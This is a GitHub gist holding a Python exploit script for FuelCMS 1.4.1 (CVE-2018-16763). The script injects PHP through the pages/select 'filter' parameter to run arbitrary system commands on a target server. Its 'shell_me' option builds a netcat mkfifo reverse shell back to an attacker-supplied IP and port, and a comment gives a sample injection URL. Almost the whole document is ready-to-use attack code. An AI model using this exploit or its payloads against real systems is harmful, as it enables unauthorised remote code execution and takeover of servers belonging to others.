Skip to content

Instantly share code, notes, and snippets.

@AnkhCorp

AnkhCorp/gist:43ee08252206c64f660136b52425e7af

Created February 6, 2025 17:14
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save AnkhCorp/43ee08252206c64f660136b52425e7af to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save AnkhCorp/43ee08252206c64f660136b52425e7af to your computer and use it in GitHub Desktop.
Download ZIP
fuel cms 1.4.1
Raw
gistfile1.txt
#!/usr/bin/python3
# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
#
# Poc Created by Ac1d (assassin)
import requests
import sys
import urllib
from requests.sessions import extract_cookies_to_jar
class col:
HEADER = '\033[95m'
BLUE = '\033[94m'
CYAN = '\033[96m'
GREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
RESET = '\033[0m'
BLACK = "\033[0;30m"
RED = "\033[0;31m"
GREEN = "\033[0;32m"
BROWN = "\033[0;33m"
BLUE = "\033[0;34m"
PURPLE = "\033[0;35m"
LIGHT_GRAY = "\033[0;37m"
DARK_GRAY = "\033[1;30m"
LIGHT_RED = "\033[1;31m"
LIGHT_GREEN = "\033[1;32m"
YELLOW = "\033[1;33m"
LIGHT_BLUE = "\033[1;34m"
LIGHT_PURPLE = "\033[1;35m"
LIGHT_CYAN = "\033[1;36m"
LIGHT_WHITE = "\033[1;37m"
BOLD = "\033[1m"
FAINT = "\033[2m"
ITALIC = "\033[3m"
UNDERLINE = "\033[4m"
BLINK = "\033[5m"
NEGATIVE = "\033[7m"
CROSSED = "\033[9m"
def banner():
banner = r"""
______ _ _____ ___ ___ _____
| ___| | / __ \| \/ |/ ___|
| |_ _ _ ___| | / \/| . . |\ `--.
| _| | | |/ _ \ | | | |\/| | `--. \
| | | |_| | __/ | \__/\| | | |/\__/ /
\_| \__,_|\___|_|\____/\_| |_/\____/
Tested on 1.4
"""
banner += "Created by Ac1d"
return col.LIGHT_BLUE + banner + col.RESET
def help():
banner = col.LIGHT_WHITE + "\n\tMenu\n"
banner += col.LIGHT_GREEN
banner += "\nexit -\tExit app"
banner += "\nshell_me -\tGet a reverse shell (netcat) "
banner += "\nhelp -\tShow this help\n"+ col.RESET
return banner
print(banner())
print(help())
#http://10.10.12.27/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27ls%20-la%27)%2B%27
if len(sys.argv) != 2:
print("\nUsage: python3 exploit.py Vulnerable IPADDRESS")
sys.exit(0)
IP=sys.argv[1]
def parsePage(page):
try:
page = page.split("<h4>A PHP Error was encountered</h4>")[0]
page = page.split("<div")[0]
page = page[6:]
return page
except:
return False
try:
while True:
cmd = input(col.LIGHT_WHITE +"fuelCMS$ " + col.RESET)
if cmd[0:4].lower() == "exit":
print(col.RED + "Exiting..." + col.RESET)
sys.exit(0)
if cmd[0:8] == "shell_me":
IP2, PORT = input(col.LIGHT_BLUE + "Enter your attacking machine IP:PORT $ " + col.RESET).split(":")
nc = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {IP2} {PORT} >/tmp/f"
cmd = nc
print(col.LIGHT_GREEN + "\nHope you had your listener ready!!" + col.RESET)
if cmd[0:4] == "help":
print(help())
continue
if not "/tmp/f;mkfifo" in cmd:
print(col.LIGHT_GRAY + "Sending request." + col.RESET)
cmd = urllib.parse.quote(cmd)
r = requests.get(f"http://{IP}/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27"+ cmd +"%27)%2B%27")
if r.status_code == 200:
page = parsePage(r.text)
if page == "\n":
print(col.RED + "No result" + col.RESET)
continue
print(col.LIGHT_GREEN+ f"\n{page.strip()}" + col.RESET)
except Exception as e:
print(col.RED + f"An error occured, please try again...\n\n{e}" + col.RESET)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment